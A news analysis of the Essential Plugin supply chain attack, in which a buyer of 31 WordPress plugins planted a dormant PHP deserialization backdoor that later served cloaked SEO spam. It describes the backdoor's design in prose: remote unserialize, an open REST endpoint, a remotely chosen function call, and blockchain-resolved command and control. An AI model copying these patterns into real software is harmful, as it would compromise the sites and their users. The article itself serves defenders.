An attacker purchased the entire Essential Plugin portfolio, over 30 WordPress plugins with a combined 400,000 installations, for a six-figure sum on the digital marketplace Flippa. The buyer's very first code commit was a PHP deserialization backdoor. It sat dormant for eight months before activating in April 2026, injecting cloaked SEO spam into every site running the compromised plugins. WordPress.org permanently closed all 31 plugins in a single day. Austin Ginder, founder of Anchor Hosting and the researcher who discovered the attack, writes:
Two supply chain attacks in two weeks. Both followed the same pattern. Buy a trusted plugin with an established install base, inherit the WordPress.org commit access, and inject malicious code.
The attack pattern is not WordPress-specific. It exploits a structural weakness shared by every package ecosystem where maintainership can be transferred: npm, PyPI, browser extension stores, and the VS Code marketplace all face the same risk. The buyer inherits the previous maintainer's commit access, reputation, and the implicit trust of every user who enabled automatic updates. No additional code review is triggered. No change-of-control notification is sent.
The precedents are well-documented. In 2018, the event-stream npm package was handed over to a new maintainer who embedded code to steal Bitcoin wallets. It had millions of weekly downloads before anyone noticed. In 2024, the XZ Utils backdoor nearly gave root access to a significant portion of the world's Linux servers after the attacker spent two years building trust in the open-source community. The pattern is always the same: build trust, get access, wait, strike.
In a LinkedIn discussion about the attack, software engineer Levent Sali argued that moving away from WordPress does not eliminate the risk:
If you move off WordPress onto a React/Next.js stack, you're now trusting hundreds of npm packages, many maintained by a single unpaid volunteer. You haven't eliminated the risk. You've just changed the vendor.
Kevin Riedl, a software developer, made a similar point in the same thread, adding that npm packages carry a potentially larger blast radius because "they also run on your local device," meaning a compromised npm dependency can affect developer workstations directly, not just web servers.
The technical execution was patient and sophisticated. The backdoor was introduced in version 2.6.7 on August 8, 2025, disguised behind a changelog entry that read "Check compatibility with WordPress version 6.8.2." The 191 added lines included a fetch_ver_info() method that calls file_get_contents() on the attacker's server and passes the response to @unserialize(), an unauthenticated REST API endpoint with permission_callback: __return_true, and a version_info_clean() method where the function name, arguments, and execution context all come from the remote payload. That is a textbook arbitrary function call. When activated on April 5-6, the payload downloaded a file named wp-comments-posts.php (deliberately similar to WordPress's legitimate wp-comments-post.php), injected PHP into wp-config.php, and served spam links and fake pages exclusively to Googlebot while remaining invisible to site owners.
The command-and-control infrastructure used an Ethereum smart contract to resolve its domain, querying public blockchain RPC endpoints. Traditional domain takedowns would not work because the attacker could update the smart contract to point to a new domain at any time. This technique was also observed in the CanisterWorm blockchain supply chain attack discovered in March 2026.
Ginder traced the timeline through 939 backup snapshots, using binary search across daily backups to pinpoint the injection window to a six-hour, 44-minute period on April 6. His forensic methodology, diffing wp-config.php file sizes across backup dates, is a technique any team maintaining production dependencies can apply.
WordPress.org's response was fast once the attack was detected. The Plugins Team closed all 31 plugins, pushed a forced auto-update (v2.6.9.1) that neutralized the phone-home mechanism, and added dashboard warnings. But the forced update did not clean the injected code in wp-config.php, meaning previously compromised sites continued serving hidden spam until administrators manually inspected and repaired the file.
The broader ecosystem lesson is what makes this relevant beyond WordPress. As The Next Web noted, npm responded to its own supply chain attacks with mandatory two-factor authentication for maintainers of high-impact packages, provenance attestation, and automated security scanning. PyPI followed a comparable path. WordPress, despite powering roughly 43% of all websites, has implemented none of these safeguards.
This is not a new playbook. In 2017, a buyer using the alias "Daley Tias" purchased the Display Widgets plugin (200,000 installs) for $15,000 and injected payday loan spam, eventually compromising at least nine plugins the same way. The Essential Plugin case is the same attack at a larger scale with more sophisticated evasion.
For developers consuming dependencies in any ecosystem, the incident reinforces several practices: pin dependency versions rather than auto-updating blindly, monitor changelogs for ownership changes and suspicious "compatibility" updates, audit the maintainer behind critical dependencies, and treat any ownership transfer as a signal to review the next release carefully.